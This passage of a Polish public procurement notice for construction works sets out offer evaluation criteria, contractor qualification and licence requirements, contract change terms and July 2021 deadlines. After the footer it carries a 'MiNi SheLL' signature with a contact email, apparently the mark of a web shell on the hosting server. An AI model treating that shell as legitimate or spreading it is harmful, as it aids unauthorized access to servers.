class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został szczegółowo opisany w SWZ. Ocenie ofert<br/>podlegają tylko oferty nie podlegające odrzuceniu. Oferta oceniana jest wg. przyjętych w postępowaniu<br/>kryteriów ceny: Cena - 60 %, wydłużenie okresu gwarancji ponad wymagany okres gwarancji<br/>wynoszący 3 lata - 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłuzenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga, aby wykonawca prowadzący działalność gospodarczą lub zawodową był wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania.<br/>Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże że:<br/>a)	wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, jedną lub więcej robót budowlanych polegających na budowie, rozbudowie, przebudowie budynku użyteczności publicznej o wartości co najmniej 250 000,00 zł brutto, (słownie: dwieście pięćdziesiąt tysięcy złotych, 00/100).<br/>b)	- dysponuje minimum jedną osobą uprawnioną do pełnienia samodzielnych funkcji technicznych w budownictwie zgodnie w wymogami ustawy Prawo budowlane (t.j Dz.U z 2020 r., poz. 2320 oraz 2021, poz. 234) tj. legitymująca się uprawnieniami do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej lub posiadającą inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień wraz z informacjami na temat kwalifikacji zawodowych, uprawnień i doświadczenia, a niezbędnego do wykonania przedmiotu zamówienia oraz informacją o postawie dysponowania, <br/><br/>- dysponuje minimum jedną osobą uprawnioną do pełnienia samodzielnych funkcji technicznych w budownictwie zgodnie w wymogami ustawy Prawo budowlane (t.j Dz.U z 2020 r., poz. 2320 oraz 2021, poz. 234) tj. legitymująca się uprawnieniami do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub posiadającą inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień wraz z informacjami na temat kwalifikacji zawodowych, uprawnień i doświadczenia, a niezbędnego do wykonania przedmiotu zamówienia oraz informacją o postawie dysponowania. <br/><br/>- dysponuje minimum jedną osobą uprawnioną do pełnienia samodzielnych funkcji technicznych w budownictwie zgodnie w wymogami ustawy Prawo budowlane (t.j Dz.U z 2020 r., poz. 2320 oraz 2021, poz. 234) tj. legitymująca się uprawnieniami do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub posiadającą inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień wraz z informacjami na temat kwalifikacji zawodowych, uprawnień i doświadczenia, a niezbędnego do wykonania przedmiotu zamówienia oraz informacją o postawie dysponowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (t. j. Dz. U. 2020 r. poz. 1076 z późn. zm.), z innym wykonawcą, który złożył odrębną<br/>ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od Wykonawcy należącego do tej<br/>samej grupy kapitałowej, zgodnie z treścią załącznika do SWZ. 2) Odpis lub informacja z Krajowego<br/>Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.<br/>109 ust. 1 pkt 4 ustawy – sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty, 2)<br/>Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony formularz OFERTA, zgodnie z treścią załącznika do SWZ;2) Dokument<br/>potwierdzający umocowanie do reprezentowania Wykonawcy, w tym pełnomocnictwo do<br/>podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów<br/>dołączonych do oferty; 3) Oświadczenie o spełnianiu warunków udziału w postępowaniu,<br/>zgodnie z treścią załącznika do SWZ;4) Oświadczenie o braku podstaw wykluczenia, zgodnie z<br/>treścią załącznika do SWZ;5) Zobowiązanie podmiotu trzeciego udostępniającego Wykonawcy<br/>zasoby w celu potwierdzenia przez Wykonawcę spełniania warunków udziału w postępowaniu;<br/>6) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia -<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy; 7)<br/>Kosztorys ofertowy; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty. Każdy w Wykonawców składa oświadczenie, dotyczące braku podstaw<br/>do wykluczenia, dokumenty potwierdzające brak podstaw wykluczenia oraz oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu – w zakresie w jakim każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane/dostawy/usługi wykonają poszczególni Wykonawcy.W przypadku Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, warunek dotyczący oświadczenia, będzie<br/>spełniony jeżeli przynajmniej jeden z Wykonawców będzie posiadał wymagane doświadczenie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.<br/>2.	Zmiana postanowień zawartej umowy może nastąpić w niżej wymienionych przypadkach: <br/>1)	zmiany terminu realizacji oraz Harmonogramu z powodu zaistnienia którejkolwiek z poniższych okoliczności, uniemożliwiających lub w sposób znacząco utrudniających (tj. takich, gdy wykonywanie robót budowlanych wymagałoby poniesienia dodatkowych, niewspółmiernych względem typowych kosztów ze strony Wykonawcy) kontynuację realizacji przedmiotu zamówienia, o czas ich występowania i przerwy nimi wywołanej: <br/>a)	okoliczności siły wyższej, tj. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, jak: wojna, atak terrorystyczny, pożar, epidemie, strajki, powódź, zarządzenia władz; <br/>b)	działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron; <br/>c)	istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa; <br/>d)	niesprzyjających warunków fizycznych bądź atmosferycznych, takich jak np: opady trwające dłużej niż 3 dni, intensywne ulewy o charakterze nawałnic, utrzymująca się wysoka temperatura w ciągu dnia na zewnątrz obiektu przekraczająca 35 st. C. trwająca dłużej niż 3 dni; jak również w przypadku wystąpienia warunków atmosferycznych uniemożliwiających prawidłowe prowadzenie prac budowlanych podyktowane sztuką budowlaną – co zostanie potwierdzone przez Kierownika Budowy i Inspektora Nadzoru Inwestorskiego ,<br/>e)	decyzji służb konserwatorskich lub nadzoru budowlanego skutkujących wstrzymaniem prac budowlanych z uwagi na konieczność wykonania prac archeologicznych (badań archeologicznych),<br/>f)	wystąpienia zamówień dodatkowych spełniających warunki z art. 455 ust. 1 pkt 3 ustawy pzp,<br/>g)	odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienia niezinwentaryzowanych obiektów budowlanych, sieci lub instalacji, których wystąpienie koliduje z realizacją przedmiotu zamówienia,<br/>h)	przedłużenia się terminu uzyskania przez Wykonawcę opinii, uzgodnień, pozwoleń<br/>i zatwierdzeń, wydawanych przez osoby trzecie i organy administracji publicznej, ponad 30 dni od daty złożenia przez Wykonawcę kompletnego wniosku o wydanie tych opinii, uzgodnień, pozwoleń lub zatwierdzeń,<br/>2)	rezygnacji z wykonania części robót – ograniczenie zakresu robót wynikające z wprowadzenia zmian istotnych lub nieistotnych w dokumentacji projektowej, na skutek np. wad w dokumentacji projektowej, które wynikły w trakcie realizacji robót i były konieczne w celu prawidłowej realizacji przedmiotu umowy lub z przyczyn niezależnych od Zamawiającego.<br/>3)	wprowadzenia rozwiązań zamiennych i robót zamiennych, pod warunkiem, iż zmiany te zostaną zaakceptowane przez nadzór autorski i Zamawiającego,<br/>4)	zwiększenia wynagrodzenia Wykonawcy ustalonego w § 5 ust. 1 w przypadku konieczności wykonania robót dodatkowych, które nie były przewidziane w dokumentacji projektowej i które są wymagane dla prawidłowego ukończenia przedmiotu zamówienia, o kwoty wynikające z przyjętego sposobu ich rozliczenia w umowie.<br/>5)	zmiany przepisów powszechnie obowiązującego prawa, dokonanych w okresie realizacji przedmiotu zamówienia, dostosowujących zapisy umowy do zmienionych przepisów,<br/>6)	aktualizacji Harmonogramu, w zakresie dostosowującym do nowych terminów wykonania zamówienia lub wynagrodzenia Wykonawcy; zmiana Harmonogramu nie dotycząca zmiany końcowego terminu realizacji robót czy końcowego wynagrodzenia nie będzie uznawana za zmianę umowy.<br/>7)	zmiany zakresu robót powierzanych Podwykonawcom, na podstawie przepisów ustawy pzp.<br/>3.	Niezależnie od powyższego, Zamawiający i Wykonawca dopuszczają możliwość zmian redakcyjnych Umowy oraz zmian będący <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-09 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-09 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-07</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-24 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com